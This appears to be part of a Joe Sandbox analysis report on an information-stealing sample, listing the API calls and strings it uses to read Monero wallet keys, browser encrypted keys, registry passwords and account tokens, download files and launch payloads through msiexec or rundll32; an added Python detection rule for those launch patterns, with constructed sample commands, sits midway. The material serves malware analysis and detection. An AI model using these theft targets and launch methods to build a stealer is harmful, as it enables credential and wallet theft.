                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: cd798cefcd8475cb59476299800749aebc8d7806e224502a7f0651cdaec88e15
                                    • Instruction ID: 7da1bb2cbfbf591d0023178cdbfae83a4c8c3167be822fdb97b8955d97e0433d
                                    • Opcode Fuzzy Hash: cd798cefcd8475cb59476299800749aebc8d7806e224502a7f0651cdaec88e15
                                    • Instruction Fuzzy Hash: D412EC71850108AAEB19FBA0DC92FEDB778BF64300F504169F50666191EF742B8EDF62
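Added example, not code from the Joe Sandbox report or from the sample. The three ShellExecuteEx calls above sit beside the strings `C:\Windows\system32\msiexec.exe`, `/i "`, ` /passive`, `.msi`, `C:\Windows\system32\rundll32.exe` and `.dll`, which is the shape of a loader handing a fetched payload to msiexec or rundll32. The rules below flag both launch shapes in process-creation telemetry. The event fields mimic Sysmon Event ID 1 (Image, CommandLine, ParentImage), the four events are constructed, and keying on a package, DLL or parent process under a user-writable directory is this example's design decision, not something the report establishes.

```python
"""Process-creation rules for the two loader paths visible in the listing:
msiexec.exe /i "<file>.msi" /passive and rundll32.exe <file>.dll[,export].

Added example, not code from the Joe Sandbox report or from the sample.
Fields mimic Sysmon Event ID 1; the events in SAMPLE_EVENTS are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Locations an unprivileged user can write to. Assumption of this example:
# a package or DLL staged here and run through msiexec/rundll32 is worth an alert.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\",
                 "\\users\\public\\", "\\programdata\\")

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


@dataclass
class Event:
    image: str
    command_line: str
    parent_image: str


def classify(ev: Event) -> Optional[str]:
    """Return a rule name when the event matches, otherwise None."""
    image = ev.image.lower()
    args = split_cmdline(ev.command_line)
    lowered = [a.lower() for a in args]
    if image.endswith("\\msiexec.exe") and "/i" in lowered and "/passive" in lowered:
        # msiexec /i <package> /passive: install showing only a progress bar.
        package = next((a for a in args if a.lower().endswith(".msi")), "")
        if in_user_writable(package) or in_user_writable(ev.parent_image):
            return "msiexec_passive_install_from_user_path"
    if image.endswith("\\rundll32.exe"):
        # rundll32 <dll>[,<export>]: the DLL path precedes the optional comma.
        for arg in args[1:]:
            dll = arg.split(",", 1)[0]
            if dll.lower().endswith(".dll") and in_user_writable(dll):
                return "rundll32_dll_from_user_path"
    return None


# Constructed sample events: two that should fire, two benign ones.
SAMPLE_EVENTS = [
    Event(r"C:\Windows\System32\msiexec.exe",
          r'C:\Windows\system32\msiexec.exe /i "C:\Users\alice\AppData\Local\Temp\upd.msi" /passive',
          r"C:\Users\alice\AppData\Local\Temp\file.exe"),
    Event(r"C:\Windows\System32\rundll32.exe",
          r"C:\Windows\system32\rundll32.exe C:\Users\alice\AppData\Roaming\x.dll,Start",
          r"C:\Users\alice\AppData\Local\Temp\file.exe"),
    Event(r"C:\Windows\System32\msiexec.exe",
          r'C:\Windows\System32\msiexec.exe /i "C:\Program Files\Vendor\setup.msi" /qn',
          r"C:\Windows\explorer.exe"),
    Event(r"C:\Windows\System32\rundll32.exe",
          r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
          r"C:\Windows\explorer.exe"),
]


def run_rules(events: List[Event]) -> List[Optional[str]]:
    return [classify(ev) for ev in events]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, run_rules(SAMPLE_EVENTS)):
        print(verdict or "benign", "<-", ev.command_line)
```

The msiexec rule deliberately requires `/passive` rather than any silent switch, because that is the exact argument string in the binary; widen it to `/qn` and `/quiet` if you want the generic behaviour, at the cost of more noise from legitimate software deployment.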
                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C36280: InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                      • Part of subcall function 00C36280: StrCmpCA.SHLWAPI(?,019DE580), ref: 00C36303
                                      • Part of subcall function 00C36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                      • Part of subcall function 00C36280: HttpOpenRequestA.WININET(00000000,GET,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C36385
                                      • Part of subcall function 00C36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                      • Part of subcall function 00C36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45318
                                    • lstrlen.KERNEL32(00000000), ref: 00C4532F
                                      • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00C45364
                                    • lstrlen.KERNEL32(00000000), ref: 00C45383
                                    • lstrlen.KERNEL32(00000000), ref: 00C453AE
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: c7138f58a3b6f6871e4f924f1b8e78b7619944f899c75e8f8590c7d5de519c0d
                                    • Instruction ID: 5a934d1938245d291ce5fb6778e6dfb960b5991a4759ebe57470fcacc67ab695
                                    • Opcode Fuzzy Hash: c7138f58a3b6f6871e4f924f1b8e78b7619944f899c75e8f8590c7d5de519c0d
                                    • Instruction Fuzzy Hash: C0510D309501489FEB18FF61CD96AED7779FF50305F504028F80A6A592EF346B4AEB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 24d73d29d38f41f881eea5962ecc163b8db5653a8a7021f1d17afc3626325baf
                                    • Instruction ID: b4fc219b249cd0017c6375d005d6e06cbc1fc33c5fcf3422b20a8be202920db8
                                    • Opcode Fuzzy Hash: 24d73d29d38f41f881eea5962ecc163b8db5653a8a7021f1d17afc3626325baf
                                    • Instruction Fuzzy Hash: 80C197B59401199BCB14EF60DC89FEE7379FB94304F044598F50AA7282EA70AEC9DF91
                                    APIs
                                      • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C442EC
                                    • lstrcat.KERNEL32(?,019DD988), ref: 00C4430B
                                    • lstrcat.KERNEL32(?,?), ref: 00C4431F
                                    • lstrcat.KERNEL32(?,019DC828), ref: 00C44333
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C48D90: GetFileAttributesA.KERNEL32(00000000,?,00C31B54,?,?,00C5564C,?,?,00C50E1F), ref: 00C48D9F
                                      • Part of subcall function 00C39CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C39D39
                                      • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                      • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                      • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                      • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                      • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                      • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                      • Part of subcall function 00C493C0: GlobalAlloc.KERNEL32(00000000,00C443DD,00C443DD), ref: 00C493D3
                                    • StrStrA.SHLWAPI(?,019DDA90), ref: 00C443F3
                                    • GlobalFree.KERNEL32(?), ref: 00C44512
                                      • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                      • Part of subcall function 00C39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                      • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                      • Part of subcall function 00C39AC0: LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C444A3
                                    • StrCmpCA.SHLWAPI(?,00C508D1), ref: 00C444C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C444D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 00C444E5
                                    • lstrcat.KERNEL32(00000000,00C50FB8), ref: 00C444F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: eb2560caf3e9b138d27adda3fc475e6c29ddfb53b86c6234afd078d6e646c946
                                    • Instruction ID: 587ec6733fe922f1a37eb35f862b124b06e258ea4698c8893f9f6a62018b9bae
                                    • Opcode Fuzzy Hash: eb2560caf3e9b138d27adda3fc475e6c29ddfb53b86c6234afd078d6e646c946
                                    • Instruction Fuzzy Hash: FD712876910208ABDB14FBE0DC8AFEE7379BB88300F144598F619A7181DA74DB49DF91
                                    APIs
                                      • Part of subcall function 00C312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C312B4
                                      • Part of subcall function 00C312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C312BB
                                      • Part of subcall function 00C312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C312D7
                                      • Part of subcall function 00C312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C312F5
                                      • Part of subcall function 00C312A0: RegCloseKey.ADVAPI32(?), ref: 00C312FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3134F
                                    • lstrlen.KERNEL32(?), ref: 00C3135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00C31377
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019D9B48,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C31465
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                      • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                      • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                      • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                      • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                      • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C314EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 964117cb293ff04cb71da6b6b799e6a1de7487bdbf23b056c76899c16ba99677
                                    • Instruction ID: 1404bf979e7bdf4b3c79b85eb6a1d4a4c1eab7abe3cac0bf0de82ba1d30bda04
                                    • Opcode Fuzzy Hash: 964117cb293ff04cb71da6b6b799e6a1de7487bdbf23b056c76899c16ba99677
                                    • Instruction Fuzzy Hash: B95121B19901185BDB15FB60DD96BED737CBF54300F4045A8B60AA2082EE706B89DFA6
                                    APIs
                                      • Part of subcall function 00C372D0: memset.MSVCRT ref: 00C37314
                                      • Part of subcall function 00C372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C3733A
                                      • Part of subcall function 00C372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C373B1
                                      • Part of subcall function 00C372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C3740D
                                      • Part of subcall function 00C372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00C37452
                                      • Part of subcall function 00C372D0: HeapFree.KERNEL32(00000000), ref: 00C37459
                                    • lstrcat.KERNEL32(00000000,00C517FC), ref: 00C37606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C37648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00C3765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C3768F
                                    • lstrcat.KERNEL32(00000000,00C51804), ref: 00C376A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C376D3
                                    • lstrcat.KERNEL32(00000000,00C51808), ref: 00C376ED
                                    • task.LIBCPMTD ref: 00C376FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: :
                                    • API String ID: 3191641157-3653984579
                                    APIs
                                    • memset.MSVCRT ref: 00C37314
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C3733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C373B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C3740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00C37452
                                    • HeapFree.KERNEL32(00000000), ref: 00C37459
                                    • task.LIBCPMTD ref: 00C37555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: Password
                                    • API String ID: 2808661185-3434357891
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,019DDE68,00000000,?,00C50E2C,00000000,?,00000000), ref: 00C48130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C48137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C48158
                                    • __aulldiv.LIBCMT ref: 00C48172
                                    • __aulldiv.LIBCMT ref: 00C48180
                                    • wsprintfA.USER32 ref: 00C481AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                      • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                    • InternetOpenA.WININET(00C50DF7,00000001,00000000,00000000,00000000), ref: 00C3610F
                                    • StrCmpCA.SHLWAPI(?,019DE580), ref: 00C36147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C3618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C361B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00C361DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C3620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00C36249
                                    • InternetCloseHandle.WININET(?), ref: 00C36253
                                    • InternetCloseHandle.WININET(00000000), ref: 00C36260
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                    • lstrlen.KERNEL32(00000000), ref: 00C3BC9F
                                      • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C3BCCD
                                    • lstrlen.KERNEL32(00000000), ref: 00C3BDA5
                                    • lstrlen.KERNEL32(00000000), ref: 00C3BDB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    APIs
                                    Strings
                                    Memory Dump Source
